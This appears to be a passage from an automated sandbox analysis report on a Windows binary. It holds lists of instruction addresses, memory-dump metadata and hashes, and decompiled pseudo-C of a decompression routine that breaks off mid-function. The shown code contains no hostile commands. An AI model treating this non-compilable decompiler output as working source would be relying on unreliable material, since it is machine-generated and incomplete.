                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406afb
                                                                                                                                                                                                              0x00406afb
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406afb
                                                                                                                                                                                                              0x00406af9
                                                                                                                                                                                                              0x00406b00
                                                                                                                                                                                                              0x00406b00
                                                                                                                                                                                                              0x00406b00
                                                                                                                                                                                                              0x00406b00
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406b3b
                                                                                                                                                                                                              0x00406b3b
                                                                                                                                                                                                              0x00406b3f
                                                                                                                                                                                                              0x00407147
                                                                                                                                                                                                              0x00407147
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407147
                                                                                                                                                                                                              0x00406b45
                                                                                                                                                                                                              0x00406b45
                                                                                                                                                                                                              0x00406b48
                                                                                                                                                                                                              0x00406b4b
                                                                                                                                                                                                              0x00406b4f
                                                                                                                                                                                                              0x00406b52
                                                                                                                                                                                                              0x00406b58
                                                                                                                                                                                                              0x00406b5a
                                                                                                                                                                                                              0x00406b5a
                                                                                                                                                                                                              0x00406b5a
                                                                                                                                                                                                              0x00406b5d
                                                                                                                                                                                                              0x00406b60
                                                                                                                                                                                                              0x00406b60
                                                                                                                                                                                                              0x00406b66
                                                                                                                                                                                                              0x00406b04
                                                                                                                                                                                                              0x00406b04
                                                                                                                                                                                                              0x00406b07
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406b07
                                                                                                                                                                                                              0x00406b68
                                                                                                                                                                                                              0x00406b68
                                                                                                                                                                                                              0x00406b6b
                                                                                                                                                                                                              0x00406b6e
                                                                                                                                                                                                              0x00406b71
                                                                                                                                                                                                              0x00406b74
                                                                                                                                                                                                              0x00406b77
                                                                                                                                                                                                              0x00406b7a
                                                                                                                                                                                                              0x00406b7d
                                                                                                                                                                                                              0x00406b80
                                                                                                                                                                                                              0x00406b83
                                                                                                                                                                                                              0x00406b86
                                                                                                                                                                                                              0x00406b9e
                                                                                                                                                                                                              0x00406ba1
                                                                                                                                                                                                              0x00406ba4
                                                                                                                                                                                                              0x00406ba7
                                                                                                                                                                                                              0x00406ba7
                                                                                                                                                                                                              0x00406baa
                                                                                                                                                                                                              0x00406bae
                                                                                                                                                                                                              0x00406bb0
                                                                                                                                                                                                              0x00406b88
                                                                                                                                                                                                              0x00406b88
                                                                                                                                                                                                              0x00406b90
                                                                                                                                                                                                              0x00406b95
                                                                                                                                                                                                              0x00406b97
                                                                                                                                                                                                              0x00406b99
                                                                                                                                                                                                              0x00406b99
                                                                                                                                                                                                              0x00406bb3
                                                                                                                                                                                                              0x00406bba
                                                                                                                                                                                                              0x00406bbd
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406bbf
                                                                                                                                                                                                              0x00406bbf
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406bbf
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406e4c
                                                                                                                                                                                                              0x00406e4c
                                                                                                                                                                                                              0x00406e50
                                                                                                                                                                                                              0x00407177
                                                                                                                                                                                                              0x00407177
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407177
                                                                                                                                                                                                              0x00406e56
                                                                                                                                                                                                              0x00406e56
                                                                                                                                                                                                              0x00406e59
                                                                                                                                                                                                              0x00406e5c
                                                                                                                                                                                                              0x00406e60
                                                                                                                                                                                                              0x00406e63
                                                                                                                                                                                                              0x00406e69
                                                                                                                                                                                                              0x00406e6b
                                                                                                                                                                                                              0x00406e6b
                                                                                                                                                                                                              0x00406e6b
                                                                                                                                                                                                              0x00406e6e
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406c1c
                                                                                                                                                                                                              0x00406c1c
                                                                                                                                                                                                              0x00406c1f
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406f5b
                                                                                                                                                                                                              0x00406f5b
                                                                                                                                                                                                              0x00406f5f
                                                                                                                                                                                                              0x00406f81
                                                                                                                                                                                                              0x00406f81
                                                                                                                                                                                                              0x00406f84
                                                                                                                                                                                                              0x00406f8e
                                                                                                                                                                                                              0x00406f91
                                                                                                                                                                                                              0x00406f91
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406f91
                                                                                                                                                                                                              0x00406f61
                                                                                                                                                                                                              0x00406f61
                                                                                                                                                                                                              0x00406f64
                                                                                                                                                                                                              0x00406f68
                                                                                                                                                                                                              0x00406f6b
                                                                                                                                                                                                              0x00406f6b
                                                                                                                                                                                                              0x00406f6e
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407018
                                                                                                                                                                                                              0x00407018
                                                                                                                                                                                                              0x0040701c
                                                                                                                                                                                                              0x0040703a
                                                                                                                                                                                                              0x0040703a
                                                                                                                                                                                                              0x0040703a
                                                                                                                                                                                                              0x0040703a
                                                                                                                                                                                                              0x00407041
                                                                                                                                                                                                              0x00407048
                                                                                                                                                                                                              0x0040704f
                                                                                                                                                                                                              0x0040704f
                                                                                                                                                                                                              0x00407056
                                                                                                                                                                                                              0x00407059
                                                                                                                                                                                                              0x00407060
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407063
                                                                                                                                                                                                              0x0040701e
                                                                                                                                                                                                              0x0040701e
                                                                                                                                                                                                              0x00407021
                                                                                                                                                                                                              0x00407024
                                                                                                                                                                                                              0x00407027
                                                                                                                                                                                                              0x0040702e
                                                                                                                                                                                                              0x00406f72
                                                                                                                                                                                                              0x00406f72
                                                                                                                                                                                                              0x00406f75
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407109
                                                                                                                                                                                                              0x00407109
                                                                                                                                                                                                              0x0040710c
                                                                                                                                                                                                              0x0040700d
                                                                                                                                                                                                              0x0040700d
                                                                                                                                                                                                              0x0040700d
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407013
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406d43
                                                                                                                                                                                                              0x00406d43
                                                                                                                                                                                                              0x00406d45
                                                                                                                                                                                                              0x00406d4c
                                                                                                                                                                                                              0x00406d4d
                                                                                                                                                                                                              0x00406d4f
                                                                                                                                                                                                              0x00406d52
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407056
                                                                                                                                                                                                              0x00407056
                                                                                                                                                                                                              0x00407059
                                                                                                                                                                                                              0x00407060
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407063
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406d88
                                                                                                                                                                                                              0x00406d88
                                                                                                                                                                                                              0x00406d8b
                                                                                                                                                                                                              0x00406dc1
                                                                                                                                                                                                              0x00406dc1
                                                                                                                                                                                                              0x00406ef1
                                                                                                                                                                                                              0x00406ef1
                                                                                                                                                                                                              0x00406ef1
                                                                                                                                                                                                              0x00406ef1
                                                                                                                                                                                                              0x00406ef4
                                                                                                                                                                                                              0x00406ef4
                                                                                                                                                                                                              0x00406ef7
                                                                                                                                                                                                              0x00406ef9
                                                                                                                                                                                                              0x00407183
                                                                                                                                                                                                              0x00407183
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407183
                                                                                                                                                                                                              0x00406eff
                                                                                                                                                                                                              0x00406eff
                                                                                                                                                                                                              0x00406f02
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406f08
                                                                                                                                                                                                              0x00406f08
                                                                                                                                                                                                              0x00406f0c
                                                                                                                                                                                                              0x00406f0f
                                                                                                                                                                                                              0x00406f0f
                                                                                                                                                                                                              0x00406f0f
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406f0f
                                                                                                                                                                                                              0x00406d8d
                                                                                                                                                                                                              0x00406d8d
                                                                                                                                                                                                              0x00406d8f
                                                                                                                                                                                                              0x00406d91
                                                                                                                                                                                                              0x00406d93
                                                                                                                                                                                                              0x00406d96
                                                                                                                                                                                                              0x00406d97
                                                                                                                                                                                                              0x00406d99
                                                                                                                                                                                                              0x00406d9b
                                                                                                                                                                                                              0x00406d9e
                                                                                                                                                                                                              0x00406da1
                                                                                                                                                                                                              0x00406db7
                                                                                                                                                                                                              0x00406db7
                                                                                                                                                                                                              0x00406dbc
                                                                                                                                                                                                              0x00406df4
                                                                                                                                                                                                              0x00406df4
                                                                                                                                                                                                              0x00406df8
                                                                                                                                                                                                              0x00406e21
                                                                                                                                                                                                              0x00406e24
                                                                                                                                                                                                              0x00406e26
                                                                                                                                                                                                              0x00406e2d
                                                                                                                                                                                                              0x00406e30
                                                                                                                                                                                                              0x00406e33
                                                                                                                                                                                                              0x00406e33
                                                                                                                                                                                                              0x00406e38
                                                                                                                                                                                                              0x00406e38
                                                                                                                                                                                                              0x00406e3a
                                                                                                                                                                                                              0x00406e3d
                                                                                                                                                                                                              0x00406e44
                                                                                                                                                                                                              0x00406e47
                                                                                                                                                                                                              0x00406e74
                                                                                                                                                                                                              0x00406e74
                                                                                                                                                                                                              0x00406e77
                                                                                                                                                                                                              0x00406e7a
                                                                                                                                                                                                              0x00406eee
                                                                                                                                                                                                              0x00406eee
                                                                                                                                                                                                              0x00406eee
                                                                                                                                                                                                              0x00406eee
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406eee
                                                                                                                                                                                                              0x00406e7c
                                                                                                                                                                                                              0x00406e7c
                                                                                                                                                                                                              0x00406e82
                                                                                                                                                                                                              0x00406e85
                                                                                                                                                                                                              0x00406e88
                                                                                                                                                                                                              0x00406e8b
                                                                                                                                                                                                              0x00406e8e
                                                                                                                                                                                                              0x00406e91
                                                                                                                                                                                                              0x00406e94
                                                                                                                                                                                                              0x00406e97
                                                                                                                                                                                                              0x00406e9a
                                                                                                                                                                                                              0x00406e9d
                                                                                                                                                                                                              0x00406eb6
                                                                                                                                                                                                              0x00406eb8
                                                                                                                                                                                                              0x00406ebb
                                                                                                                                                                                                              0x00406ebc
                                                                                                                                                                                                              0x00406ebf
                                                                                                                                                                                                              0x00406ec1
                                                                                                                                                                                                              0x00406ec4
                                                                                                                                                                                                              0x00406ec6
                                                                                                                                                                                                              0x00406ec8
                                                                                                                                                                                                              0x00406ecb
                                                                                                                                                                                                              0x00406ecd
                                                                                                                                                                                                              0x00406ed0
                                                                                                                                                                                                              0x00406ed4
                                                                                                                                                                                                              0x00406ed6
                                                                                                                                                                                                              0x00406ed6
                                                                                                                                                                                                              0x00406ed7
                                                                                                                                                                                                              0x00406eda
                                                                                                                                                                                                              0x00406edd
                                                                                                                                                                                                              0x00406e9f
                                                                                                                                                                                                              0x00406e9f
                                                                                                                                                                                                              0x00406ea7
                                                                                                                                                                                                              0x00406eac
                                                                                                                                                                                                              0x00406eae
                                                                                                                                                                                                              0x00406eb1
                                                                                                                                                                                                              0x00406eb1
                                                                                                                                                                                                              0x00406ee0
                                                                                                                                                                                                              0x00406ee7
                                                                                                                                                                                                              0x00406e71
                                                                                                                                                                                                              0x00406e71
                                                                                                                                                                                                              0x00406e71
                                                                                                                                                                                                              0x00406e71
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406ee9
                                                                                                                                                                                                              0x00406ee9
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406ee9
                                                                                                                                                                                                              0x00406ee7
                                                                                                                                                                                                              0x00406dfa
                                                                                                                                                                                                              0x00406dfa
                                                                                                                                                                                                              0x00406dfd
                                                                                                                                                                                                              0x00406dff
                                                                                                                                                                                                              0x00406e02
                                                                                                                                                                                                              0x00406e05
                                                                                                                                                                                                              0x00406e08
                                                                                                                                                                                                              0x00406e0a
                                                                                                                                                                                                              0x00406e0d
                                                                                                                                                                                                              0x00406e10
                                                                                                                                                                                                              0x00406e10
                                                                                                                                                                                                              0x00406e13
                                                                                                                                                                                                              0x00406e13
                                                                                                                                                                                                              0x00406e16
                                                                                                                                                                                                              0x00406e1d
                                                                                                                                                                                                              0x00406df1
                                                                                                                                                                                                              0x00406df1
                                                                                                                                                                                                              0x00406df1
                                                                                                                                                                                                              0x00406df1
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406e1f
                                                                                                                                                                                                              0x00406e1f
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406e1f
                                                                                                                                                                                                              0x00406e1d
                                                                                                                                                                                                              0x00406da3
                                                                                                                                                                                                              0x00406da3
                                                                                                                                                                                                              0x00406da6
                                                                                                                                                                                                              0x00406da8
                                                                                                                                                                                                              0x00406dab
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406b0a
                                                                                                                                                                                                              0x00406b0a
                                                                                                                                                                                                              0x00406b0e
                                                                                                                                                                                                              0x00407153
                                                                                                                                                                                                              0x00407153
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407153
                                                                                                                                                                                                              0x00406b14
                                                                                                                                                                                                              0x00406b14
                                                                                                                                                                                                              0x00406b17
                                                                                                                                                                                                              0x00406b1a
                                                                                                                                                                                                              0x00406b1d
                                                                                                                                                                                                              0x00406b20
                                                                                                                                                                                                              0x00406b23
                                                                                                                                                                                                              0x00406b26
                                                                                                                                                                                                              0x00406b28
                                                                                                                                                                                                              0x00406b2b
                                                                                                                                                                                                              0x00406b2e
                                                                                                                                                                                                              0x00406b31
                                                                                                                                                                                                              0x00406b33
                                                                                                                                                                                                              0x00406b33
                                                                                                                                                                                                              0x00406b33
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406c95
                                                                                                                                                                                                              0x00406c95
                                                                                                                                                                                                              0x00406c99
                                                                                                                                                                                                              0x0040715f
                                                                                                                                                                                                              0x0040715f
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040715f
                                                                                                                                                                                                              0x00406c9f
                                                                                                                                                                                                              0x00406c9f
                                                                                                                                                                                                              0x00406ca2
                                                                                                                                                                                                              0x00406ca5
                                                                                                                                                                                                              0x00406ca8
                                                                                                                                                                                                              0x00406caa
                                                                                                                                                                                                              0x00406caa
                                                                                                                                                                                                              0x00406caa
                                                                                                                                                                                                              0x00406cad
                                                                                                                                                                                                              0x00406cb0
                                                                                                                                                                                                              0x00406cb3
                                                                                                                                                                                                              0x00406cb6
                                                                                                                                                                                                              0x00406cb9
                                                                                                                                                                                                              0x00406cbc
                                                                                                                                                                                                              0x00406cbd
                                                                                                                                                                                                              0x00406cbf
                                                                                                                                                                                                              0x00406cbf
                                                                                                                                                                                                              0x00406cbf
                                                                                                                                                                                                              0x00406cc2
                                                                                                                                                                                                              0x00406cc5
                                                                                                                                                                                                              0x00406cc8
                                                                                                                                                                                                              0x00406ccb
                                                                                                                                                                                                              0x00406ccb
                                                                                                                                                                                                              0x00406ccb
                                                                                                                                                                                                              0x00406cce
                                                                                                                                                                                                              0x00406cd0
                                                                                                                                                                                                              0x00406cd0
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406f12
                                                                                                                                                                                                              0x00406f12
                                                                                                                                                                                                              0x00406f12
                                                                                                                                                                                                              0x00406f16
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406f1c
                                                                                                                                                                                                              0x00406f1c
                                                                                                                                                                                                              0x00406f1f
                                                                                                                                                                                                              0x00406f22
                                                                                                                                                                                                              0x00406f25
                                                                                                                                                                                                              0x00406f27
                                                                                                                                                                                                              0x00406f27
                                                                                                                                                                                                              0x00406f27
                                                                                                                                                                                                              0x00406f2a
                                                                                                                                                                                                              0x00406f2d
                                                                                                                                                                                                              0x00406f30
                                                                                                                                                                                                              0x00406f33
                                                                                                                                                                                                              0x00406f36
                                                                                                                                                                                                              0x00406f39
                                                                                                                                                                                                              0x00406f3a
                                                                                                                                                                                                              0x00406f3c
                                                                                                                                                                                                              0x00406f3c
                                                                                                                                                                                                              0x00406f3c
                                                                                                                                                                                                              0x00406f3f
                                                                                                                                                                                                              0x00406f42
                                                                                                                                                                                                              0x00406f45
                                                                                                                                                                                                              0x00406f48
                                                                                                                                                                                                              0x00406f4b
                                                                                                                                                                                                              0x00406f4f
                                                                                                                                                                                                              0x00406f51
                                                                                                                                                                                                              0x00406f54
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406f56
                                                                                                                                                                                                              0x00406f56
                                                                                                                                                                                                              0x00406cd3
                                                                                                                                                                                                              0x00406cd3
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406cd3
                                                                                                                                                                                                              0x00406f54
                                                                                                                                                                                                              0x00407189
                                                                                                                                                                                                              0x00407189
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004067b8
                                                                                                                                                                                                              0x004071c0
                                                                                                                                                                                                              0x004071c0
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004071c0
                                                                                                                                                                                                              0x0040700d
                                                                                                                                                                                                              0x0040708d
                                                                                                                                                                                                              0x00407056

                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 8cc43af0f3dc7360b650843029f4fb37e98cf8e44e9d3f0eb3b9d5ec05d02dde
                                                                                                                                                                                                              • Instruction ID: 56db4e79aaf5e8580c905796a14d264bc3fb4972df64c765fca97ee639103a5c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8cc43af0f3dc7360b650843029f4fb37e98cf8e44e9d3f0eb3b9d5ec05d02dde
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 87A15531E04229CBDF28CFA8C8446ADBBB1FF44305F14812ED856BB281C7786A86DF45
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 98%
                                                                                                                                                                                                              			E00406F5B() {
                                                                                                                                                                                                              				void _t533;
                                                                                                                                                                                                              				signed int _t534;
                                                                                                                                                                                                              				signed int _t535;
                                                                                                                                                                                                              				signed int* _t605;
                                                                                                                                                                                                              				void* _t612;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				L0:
                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                              					L0:
                                                                                                                                                                                                              					if( *(_t612 - 0x40) != 0) {
                                                                                                                                                                                                              						 *(_t612 - 0x84) = 0x13;
                                                                                                                                                                                                              						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                                                                                                                                                                                                              						goto L132;
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						__eax =  *(__ebp - 0x4c);
                                                                                                                                                                                                              						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                                                                                                              						__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                                              						__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                                                              						__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                                                                                                              						L130:
                                                                                                                                                                                                              						 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                              						 *(__ebp - 0x40) = 3;
                                                                                                                                                                                                              						L144:
                                                                                                                                                                                                              						 *(__ebp - 0x7c) = 0x14;
                                                                                                                                                                                                              						L145:
                                                                                                                                                                                                              						__eax =  *(__ebp - 0x40);
                                                                                                                                                                                                              						 *(__ebp - 0x50) = 1;
                                                                                                                                                                                                              						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                                                                                                              						L149:
                                                                                                                                                                                                              						if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                                                              							__ecx =  *(__ebp - 0x40);
                                                                                                                                                                                                              							__ebx =  *(__ebp - 0x50);
                                                                                                                                                                                                              							0 = 1;
                                                                                                                                                                                                              							__eax = 1 << __cl;
                                                                                                                                                                                                              							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                                                                                                              							__eax =  *(__ebp - 0x7c);
                                                                                                                                                                                                              							 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                              							while(1) {
                                                                                                                                                                                                              								L140:
                                                                                                                                                                                                              								 *(_t612 - 0x88) = _t533;
                                                                                                                                                                                                              								while(1) {
                                                                                                                                                                                                              									L1:
                                                                                                                                                                                                              									_t534 =  *(_t612 - 0x88);
                                                                                                                                                                                                              									if(_t534 > 0x1c) {
                                                                                                                                                                                                              										break;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									switch( *((intOrPtr*)(_t534 * 4 +  &M004071C8))) {
                                                                                                                                                                                                              										case 0:
                                                                                                                                                                                                              											if( *(_t612 - 0x6c) == 0) {
                                                                                                                                                                                                              												goto L170;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                                                                                                                                              											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                                                                                                                                                              											_t534 =  *( *(_t612 - 0x70));
                                                                                                                                                                                                              											if(_t534 > 0xe1) {
                                                                                                                                                                                                              												goto L171;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											_t538 = _t534 & 0x000000ff;
                                                                                                                                                                                                              											_push(0x2d);
                                                                                                                                                                                                              											asm("cdq");
                                                                                                                                                                                                              											_pop(_t569);
                                                                                                                                                                                                              											_push(9);
                                                                                                                                                                                                              											_pop(_t570);
                                                                                                                                                                                                              											_t608 = _t538 / _t569;
                                                                                                                                                                                                              											_t540 = _t538 % _t569 & 0x000000ff;
                                                                                                                                                                                                              											asm("cdq");
                                                                                                                                                                                                              											_t603 = _t540 % _t570 & 0x000000ff;
                                                                                                                                                                                                              											 *(_t612 - 0x3c) = _t603;
                                                                                                                                                                                                              											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                                                                                                                                                                                                              											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                                                                                                                                                                                                              											_t611 = (0x300 << _t603 + _t608) + 0x736;
                                                                                                                                                                                                              											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                                                                                                                                                                                                              												L10:
                                                                                                                                                                                                              												if(_t611 == 0) {
                                                                                                                                                                                                              													L12:
                                                                                                                                                                                                              													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                                                                                                                                                                                                              													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                                                                                                                                                                              													goto L15;
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													goto L11;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												do {
                                                                                                                                                                                                              													L11:
                                                                                                                                                                                                              													_t611 = _t611 - 1;
                                                                                                                                                                                                              													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                                                                                                                                                                                                              												} while (_t611 != 0);
                                                                                                                                                                                                              												goto L12;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											if( *(_t612 - 4) != 0) {
                                                                                                                                                                                                              												GlobalFree( *(_t612 - 4));
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                                                                                                              											 *(_t612 - 4) = _t534;
                                                                                                                                                                                                              											if(_t534 == 0) {
                                                                                                                                                                                                              												goto L171;
                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                              												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                                                                                                                                                                                                              												goto L10;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              										case 1:
                                                                                                                                                                                                              											L13:
                                                                                                                                                                                                              											__eflags =  *(_t612 - 0x6c);
                                                                                                                                                                                                              											if( *(_t612 - 0x6c) == 0) {
                                                                                                                                                                                                              												 *(_t612 - 0x88) = 1;
                                                                                                                                                                                                              												goto L170;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                                                                                                                                              											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                                                                                                                                                                                                              											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                                                                                                                                                              											_t45 = _t612 - 0x48;
                                                                                                                                                                                                              											 *_t45 =  *(_t612 - 0x48) + 1;
                                                                                                                                                                                                              											__eflags =  *_t45;
                                                                                                                                                                                                              											L15:
                                                                                                                                                                                                              											if( *(_t612 - 0x48) < 4) {
                                                                                                                                                                                                              												goto L13;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											_t546 =  *(_t612 - 0x40);
                                                                                                                                                                                                              											if(_t546 ==  *(_t612 - 0x74)) {
                                                                                                                                                                                                              												L20:
                                                                                                                                                                                                              												 *(_t612 - 0x48) = 5;
                                                                                                                                                                                                              												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                                                                                                                                                                                                              												goto L23;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											 *(_t612 - 0x74) = _t546;
                                                                                                                                                                                                              											if( *(_t612 - 8) != 0) {
                                                                                                                                                                                                              												GlobalFree( *(_t612 - 8));
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                                                                                                                                                                                                              											 *(_t612 - 8) = _t534;
                                                                                                                                                                                                              											if(_t534 == 0) {
                                                                                                                                                                                                              												goto L171;
                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                              												goto L20;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              										case 2:
                                                                                                                                                                                                              											L24:
                                                                                                                                                                                                              											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                                                                                                                                                                                                              											 *(_t612 - 0x84) = 6;
                                                                                                                                                                                                              											 *(_t612 - 0x4c) = _t553;
                                                                                                                                                                                                              											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                                                                                                                                                                                                              											goto L132;
                                                                                                                                                                                                              										case 3:
                                                                                                                                                                                                              											L21:
                                                                                                                                                                                                              											__eflags =  *(_t612 - 0x6c);
                                                                                                                                                                                                              											if( *(_t612 - 0x6c) == 0) {
                                                                                                                                                                                                              												 *(_t612 - 0x88) = 3;
                                                                                                                                                                                                              												goto L170;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                                                                                                                                              											_t67 = _t612 - 0x70;
                                                                                                                                                                                                              											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                                                                                                                                                                                                              											__eflags =  *_t67;
                                                                                                                                                                                                              											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											L23:
                                                                                                                                                                                                              											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                                                                                                                                                                                                              											if( *(_t612 - 0x48) != 0) {
                                                                                                                                                                                                              												goto L21;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											goto L24;
                                                                                                                                                                                                              										case 4:
                                                                                                                                                                                                              											L133:
                                                                                                                                                                                                              											_t531 =  *_t605;
                                                                                                                                                                                                              											_t588 = _t531 & 0x0000ffff;
                                                                                                                                                                                                              											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                                                                                                                                                                                                              											if( *(_t612 - 0xc) >= _t564) {
                                                                                                                                                                                                              												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                                                                                                                                                                                                              												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                                                                                                                                                                                                              												 *(_t612 - 0x40) = 1;
                                                                                                                                                                                                              												_t532 = _t531 - (_t531 >> 5);
                                                                                                                                                                                                              												__eflags = _t532;
                                                                                                                                                                                                              												 *_t605 = _t532;
                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                              												 *(_t612 - 0x10) = _t564;
                                                                                                                                                                                                              												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                                                                                                                                                                              												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											if( *(_t612 - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              												goto L139;
                                                                                                                                                                                                              											} else {
